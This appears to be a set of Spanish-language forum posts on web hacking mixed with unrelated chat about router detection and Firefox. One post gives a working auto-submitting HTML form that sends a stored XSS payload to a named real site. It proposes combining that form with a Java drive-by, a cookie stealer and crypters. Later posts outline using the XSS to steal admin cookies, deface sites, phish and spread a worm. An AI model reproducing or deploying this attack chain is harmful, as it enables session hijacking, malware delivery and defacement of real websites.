sigues con lo mismo XD

mira aca otra idea de lo que se podria hacer con un java drive by
https://www.youtube.com/watch?v=BBj5JQAigQI

bastaria con meter este html en cualquier hosting por ejemplo + un java drive+ un cookies stealer  a ver que tal XD

<html>
<head>
 
</head>
<body onload="javascript:document.form1.submit();">
<form method=post action="http://www.tecasystem.com/prueba2.php" name="form1">
<input type=hidden name="texto" value="<script>alert(/soy un java drive con un troyano :D/)</script>">
 
</body>
</html>

creo que no hay una respuesta simple para ello talves podrias intentar pcap para python o intentar algo con la api de windows (claro si estas en windows)

se me ocurre algo mas simple con urllib si el menu de login del router es diferente el de la oficina con el de tu casa bastaria compararla  cual de los dos routers son y en caso de ser el login del router de la casa hacer x cosa y en el de la oficina "y" cosas

otra idea es que si por ejemplo la ip del router de tu casa es 192.168.1.1 y el de la oficina es 192.168.0.1 pues detectando eso seria suficiente


otra idea detecta la mac de los routers para eso bastaria con un ping al router y luego el comando arp -a ipDeRouter 100% seguro que funciona esta ultima

y los crypters  ?

me gusta bastante firefox comenzando porque no me gustan las politicas de privacidad de chrome ademas tiene excelentes extensiones  para seguirdad y/o diseño web  y temas geniales. tengo web development  junto con  hackbar y adblock plus. y un tema de hellsing .

creo que no lo cambiaria por nada jeje saludos

talves mañana te mando un pv

suerte en tu proyecto

la redireccion web o el uso de bases de datos en otro dominio es lo de menos si se programa bien la web

tanto como modificar archivos que esten en otro dominio la verdad no conozco asi que no sabria decirte pero creo que aplicaria el mismo principio si se programa bien entonces no pasa nada

mira no soy experto en seguridad web pero se que usan tokens por sesion para hacer mas dificil el falsificar peticiones web , se filtran las salidas de las variables con htmlentities

usa los include de php(por ejem mira que el code de wordpress esta lleno de estos) en vez de esos iframes

tambien usa https para evitar algunas cosas

en fin hay muchas cosas que se pueden hacer XD

bue yo haria esto mne registro y todo creo una web que con javascript envie automaticamente una peticion web explotando el xss antes mencionado y bue asi podria hacer lo antes mencionado desde likejacking - hasta desfacear alguna web del vecino.

luego le envio a alguien ese enlace de la pagina que modifica algo con el xss
 
en fin dependiendo como lo hagas se tendrian x o y posibilidades

pues si probe con un tipico alert y salio el mensaje por eso te digo ...


pd: por nada

aa vale

pregunta: que haras cuando tengas un cms que necesariamente necesitara cookies y un xss en el que pueden poner cualquier codigo incluyendo javascript que podria con las cookies de admin modificar el codigo de fuente de una web o hacer un worm?

incluso se me ocurre que con ese iframe seria bastante simple hacer phishing...

o cosas como likejacking clickjacking etc etc